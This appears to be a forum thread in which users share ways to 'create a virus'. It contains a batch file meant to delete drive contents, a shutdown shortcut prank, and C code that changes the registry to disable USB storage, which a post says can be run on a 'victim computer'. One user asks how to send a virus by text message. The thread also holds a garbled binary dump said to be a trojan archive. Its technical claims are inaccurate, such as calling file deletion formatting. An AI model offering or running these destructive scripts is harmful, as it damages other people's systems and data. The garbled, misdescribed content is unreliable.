Welcome to the forum and just make a program that deletes all file can also be termed as virus. So what you want to know post it with details in the right forum
you can create a small virus as: Right click of mouse on desktop then new and then shortcut , and now write shutdown -s -t 20 -c "virus affected" in the type the location of item text box Now click on next and give the name as you want in the text Box.
you can create another computer virus by using following code writing on notepad: @echo off DEL D: -Y DEL E: -Y now you can save it as filename.bat These virus will format your hardderive as given the name of derive.
what type of attack do you want with a Virus.After running these virus will take action corresponding to your service.
could you remove the code of that trojan horse virus Rar! Ïs ì=t 1 ¾ Œ 7»€»„:3 SpaceEater.C ðŸð† ÍÍÁ[߀ïƒëTASqÕÍÇ[Ý#àK[jÄÒu&¹‡j¢„ÛS¢FØINs…÷z*cœkøgRM´¤ru´_ð‘-þœÃ‡Q?8wt“„é$ð Ä ø€=U*ãN†mñ¨+ê'øšº0Àª!Ӭ߸`–V Bø*'õŽ„è&‘¨ŠòÊ^N TZê8a)é‰$ÿ¨ŒR"O¥SÕéôj~Ʋão·#<¬Æuû§acÍ•údÌí Û6Ö)0í ŒbÔb*GµX¹µøDðœ«{µÚ¿œý¢?¶ˆ„íÄÛ"h<±õ°à»ÏÓõ²QÊt*ˆÑ\ZÜDÈÌ Bgµì$ɸj‡ž‚½2‘¥U‡šÆÈ1µ?g ™Š§s± –OZ|ÓbõFFG3f{L‡z%v¨ã¦4QÁ‰‘Ï¿w6/c,]=søôú$Ú“*my<ÏsÛ/o3…ฅñÓæ¦øF^nï‘uù*þöÇŸ¶=‹(І0þdaMmš«…XmtÁ^Df„[ÀlB™¨(›G[f)‹±Àdäe¶ãY’ç5‚7ÕTQ9„]#ÕßL_F5KúÅÁÍÂ÷ÇA»[?c׬¿¨Ó¸Ô'§Ïq#hîBy¼zŠî_ŒCç·´”„pG2vÔ63ÈѱΨÙBè6¯QQ™m¤‹@4vv)Q_*îH×¥1í-ÈŽ½ ‡é„„ž¢ñ˜ 8ߨF)‰«åÓ‘ŸØÔ y¾&Û†Kå&PgIkÓ²ÉË/öûɼ D6âE˜¹NçÆÈ'—ŒÈÛzè‘L&¾8ÛŠ ZC‹@9ĺêüyžËÜlÓ+p¹HQî KFt^«² ÉP4F/ù, (©VS]E—,£Yš=S¥f½€‰Ö{šxºÔc,«HÉ·Æç’º·£¾IÑOö~*‹WÖþ…‡À8·ÿ'èúþ÷ïWå«ÊüUÃt;¢3„®*e¿†Iî%jÞÁAÝ3æ5!©Lª'×ÒË%ž¬ÙÙËG{W\ˆÔ:ÌÒÌ÷gˆk•T§%w¯R²Hw]Xá#¬À~D?±Âl»µE¯=g(qÖ@(õõ8d:â¨"Î(µà‘“0ˆÛfÀbDŸA)x:¨‘S×}ñùÑ‹kõ‰ñ;àü™Û¾+ÍǾsÃߺÿÖ8LýgQï¦øºNž`ßMiü]'O2Óû¤/lÿÀ+µ±ta]/Þƒ‘ þèR^3ÍPôðÖ«ý·–¼ÿ³X Q «7۶ǃzÛS’>ÀêœGÑd¯ÇüÔ½™)217;ùJúÔ-W‘£*¦ã~¼Ê8.Y¯Ìç?.¯~#Où®eb~Ö6äË ,õHúc뫊h†l{#NÔºŽºÍ[.0»ØŠÞ}|6Tƒ½¢4‚ÙpÿJƒÐ1òÔ¨i’©N,€VÑui¾Ô_*A¿á*ÜN2Çï¹DÍW z)ÚŸ3+ƒQlùHcy>J<Ï3¬Ÿß3Šá7غh›²òWý6«D*¤“ÚàXÄÆ±àpF%’`18V»€_ù@Ä={ @
to have a virus like effect you can block the usb ports by using c-language code. here is the code to block usb: #include<stdio.h> void main() { system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f"); } /*use it own your own risk */ /* if you are able to create .exe file after execution and you are able to run it on victim computer then that will work as virus for him which has block victim usb . leave comment */ i am new user.
to unblock usb: #include<stdio.h> void main() { system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f"); } /* use it on your own risk */ !!!!!!!!!:nice:!!!!!!!! enjoy !!!!:nice:!!!!!!!!
can anyone give me details on how to send a virus thru text messaging via computer to cell phone if its possible or thru a text on fb? thanks!!!:happy: